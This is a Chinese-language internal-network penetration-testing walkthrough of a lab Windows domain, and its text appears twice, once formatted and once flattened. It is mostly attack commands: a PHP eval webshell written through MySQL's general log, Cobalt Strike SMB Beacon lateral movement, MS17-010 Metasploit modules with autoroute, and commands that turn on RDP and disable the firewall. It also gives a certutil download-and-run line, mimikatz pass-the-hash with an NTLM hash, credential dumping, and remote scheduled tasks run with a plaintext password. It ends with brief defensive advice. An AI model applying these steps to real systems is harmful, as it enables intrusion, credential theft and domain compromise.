巧用smb拿下不出网主机
字数 1703 2025-08-05 08:17:55

巧用SMB Beacon攻陷不出网主机 - 内网渗透实战指南

1. 环境概述

1.1 网络拓扑

  • 内网网段: 192.168.52.0/24
  • 外网网段: 192.168.10.0/24
  • 攻击机: Kali (192.168.10.11)
  • 靶场环境:
    • Win7(内): 192.168.52.143
    • Win7(外): 192.168.10.15
    • 域内主机:
      • Winserver2003: 192.168.52.141
      • Winserver2008(DC): 192.168.52.138

1.2 网络特性

  • Win7具有双网卡,可内外网通信
  • 域内主机仅限内网通信
  • 初始状态下DC无法ping通Win7,关闭防火墙后连通

2. 初始渗透

2.1 Web服务器渗透

  1. 端口扫描:

    nmap -sS -P0 -sV -O 192.168.10.15
    • 发现开放80端口,运行PHP探针

  2. 数据库弱口令利用:

    • 发现MySQL连接检测接口
    • 使用root/root成功登录

  3. 后台发现:

    • 使用御剑扫描发现phpMyAdmin目录
    • 同样使用root/root登录

2.2 通过phpMyAdmin写Webshell

  1. 方法一: SELECT INTO OUTFILE

    • 失败原因: secure_file_priv值为NULL

  2. 方法二: 全局日志写shell

    SHOW VARIABLES LIKE '%general%';  -- 查看日志配置
SET global general_log = on;      -- 开启全局日志
SET global general_log_file = 'C:\\phpStudy\\WWW\\shell.php';  -- 修改日志路径
SELECT '<?php eval($_POST[cmd]);?>';  -- 写入一句话木马
    • 关键点: 注意路径差异(MySQL数据目录与Web目录不同)

  3. 蚁剑连接:

    • 使用生成的shell.php成功连接

3. 内网信息收集

3.1 基础信息

  • 系统权限: Administrator
  • 网络配置: ipconfig /all
  • 进程列表: tasklist /svc
  • 确认无杀软防护

3.2 CS上线

  1. 上传CS生成的木马exe
  2. 使用计划任务执行上线 
    schtasks /create /tn "test" /tr C:\path\to\payload.exe /sc once /st HH:MM /ru System

4. 内网横向移动

4.1 信息收集

  • 域信息: net view
  • 主机扫描: 使用CS内置端口扫描
  • 凭证获取:
    • hashdump
    • logonpasswords (获取明文密码)

4.2 不出网主机上线方法

  1. SMB Beacon
    • 通过命名管道通信
    • 流量封装在SMB协议中,隐蔽性高
  2. HTTP代理上线
  3. Pystinger搭建SOCKS4代理

5. SMB Beacon实战

5.1 使用条件

  • 目标主机开放445端口
  • 必须使用同一Cobalt Strike实例管理的Beacon
  • 需要目标主机的管理员权限凭据

5.2 操作步骤

  1. 建立SMB Listener
  2. 使用psexec横向移动:
    • 选择现有Beacon作为跳板
    • 使用管理员凭据(administrator)
  3. 连接成功标识: Beacon右侧显示∞∞符号

5.3 注意事项

  • 不出网主机依赖出网机作为中间人
  • 出网机断开则不出网主机也会断开

6. MS17-010漏洞利用

6.1 漏洞检测

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.0/24
run

6.2 常用利用模块

  1. 永恒之蓝(直接利用):

    use exploit/windows/smb/ms17_010_eternalblue
    • 优点: 只要存在漏洞即可利用
    • 缺点: 可能使目标蓝屏,杀软拦截严格

  2. 命名管道利用:

    use auxiliary/admin/smb/ms17_010_command
use exploit/windows/smb/ms17_010_psexec
    • 需要目标开启命名管道
    • 稳定性更高

6.3 不出网环境下的利用技巧

  1. 在已控主机(win7)添加路由: 
    run get_local_subnets
run autoroute -s 192.168.52.0/24
run autoroute -p
  2. 通过路由攻击不出网主机

7. WMI横向移动

7.1 准备工作

  1. 开启目标RDP: 
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  2. 关闭防火墙: 
    netsh advfirewall set allprofiles state off

7.2 WMI执行命令

  1. 使用Ladon工具: 
    Ladon.exe wmiexec 192.168.52.138 administrator hongrisec@2020 whoami
  2. 上传正向shell并执行: 
    certutil.exe -urlcache -split -f http://192.168.52.143/6666.exe & 6666.exe

8. 域控提权

8.1 提权方法

  1. CVE-2018-8120提权
  2. MS14-068提权(Kerberos漏洞)

8.2 票据传递攻击

  1. 使用mimikatz进行PTH: 
    sekurlsa::pth /domain:god.org /user:administrator /ntlm:81be2f80d568100549beac645d6a7141
  2. 计划任务执行: 
    schtasks /create /tn "test" /tr C:\yukong.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "hongrisec@2020"
  3. 清除计划任务: 
    schtasks /delete /s 192.168.52.138 /tn "test" /f

9. 总结与防御建议

9.1 攻击技术总结

  1. 不出网主机可通过SMB Beacon、HTTP代理等方式上线
  2. MS17-010在内网中危害极大
  3. WMI是强大的横向移动工具
  4. 票据传递攻击可有效突破域环境

9.2 防御建议

  1. 及时修补MS17-010等高危漏洞
  2. 限制445等敏感端口的访问
  3. 监控WMI异常活动
  4. 禁用不必要的计划任务
  5. 使用强密码策略,防止凭证窃取
  6. 启用防火墙,限制内网主机间不必要的通信

通过本实战案例,我们系统性地掌握了针对不出网主机的渗透方法,特别是SMB Beacon的巧妙运用,为内网渗透提供了新的思路和技术手段。

巧用SMB Beacon攻陷不出网主机 - 内网渗透实战指南 1. 环境概述 1.1 网络拓扑 内网网段 : 192.168.52.0/24 外网网段 : 192.168.10.0/24 攻击机 : Kali (192.168.10.11) 靶场环境 : Win7(内): 192.168.52.143 Win7(外): 192.168.10.15 域内主机: Winserver2003: 192.168.52.141 Winserver2008(DC): 192.168.52.138 1.2 网络特性 Win7具有双网卡,可内外网通信 域内主机仅限内网通信 初始状态下DC无法ping通Win7,关闭防火墙后连通 2. 初始渗透 2.1 Web服务器渗透 端口扫描 : 发现开放80端口,运行PHP探针 数据库弱口令利用 : 发现MySQL连接检测接口 使用root/root成功登录 后台发现 : 使用御剑扫描发现phpMyAdmin目录 同样使用root/root登录 2.2 通过phpMyAdmin写Webshell 方法一: SELECT INTO OUTFILE 失败原因: secure_file_priv 值为NULL 方法二: 全局日志写shell 关键点: 注意路径差异(MySQL数据目录与Web目录不同) 蚁剑连接 : 使用生成的shell.php成功连接 3. 内网信息收集 3.1 基础信息 系统权限: Administrator 网络配置: ipconfig /all 进程列表: tasklist /svc 确认无杀软防护 3.2 CS上线 上传CS生成的木马exe 使用计划任务执行上线 4. 内网横向移动 4.1 信息收集 域信息: net view 主机扫描: 使用CS内置端口扫描 凭证获取: hashdump logonpasswords (获取明文密码) 4.2 不出网主机上线方法 SMB Beacon 通过命名管道通信 流量封装在SMB协议中,隐蔽性高 HTTP代理上线 Pystinger搭建SOCKS4代理 5. SMB Beacon实战 5.1 使用条件 目标主机开放445端口 必须使用同一Cobalt Strike实例管理的Beacon 需要目标主机的管理员权限凭据 5.2 操作步骤 建立SMB Listener 使用psexec横向移动: 选择现有Beacon作为跳板 使用管理员凭据(administrator) 连接成功标识: Beacon右侧显示∞∞符号 5.3 注意事项 不出网主机依赖出网机作为中间人 出网机断开则不出网主机也会断开 6. MS17-010漏洞利用 6.1 漏洞检测 6.2 常用利用模块 永恒之蓝(直接利用) : 优点: 只要存在漏洞即可利用 缺点: 可能使目标蓝屏,杀软拦截严格 命名管道利用 : 需要目标开启命名管道 稳定性更高 6.3 不出网环境下的利用技巧 在已控主机(win7)添加路由: 通过路由攻击不出网主机 7. WMI横向移动 7.1 准备工作 开启目标RDP: 关闭防火墙: 7.2 WMI执行命令 使用Ladon工具: 上传正向shell并执行: 8. 域控提权 8.1 提权方法 CVE-2018-8120提权 MS14-068提权 (Kerberos漏洞) 8.2 票据传递攻击 使用mimikatz进行PTH: 计划任务执行: 清除计划任务: 9. 总结与防御建议 9.1 攻击技术总结 不出网主机可通过SMB Beacon、HTTP代理等方式上线 MS17-010在内网中危害极大 WMI是强大的横向移动工具 票据传递攻击可有效突破域环境 9.2 防御建议 及时修补MS17-010等高危漏洞 限制445等敏感端口的访问 监控WMI异常活动 禁用不必要的计划任务 使用强密码策略,防止凭证窃取 启用防火墙,限制内网主机间不必要的通信 通过本实战案例,我们系统性地掌握了针对不出网主机的渗透方法,特别是SMB Beacon的巧妙运用,为内网渗透提供了新的思路和技术手段。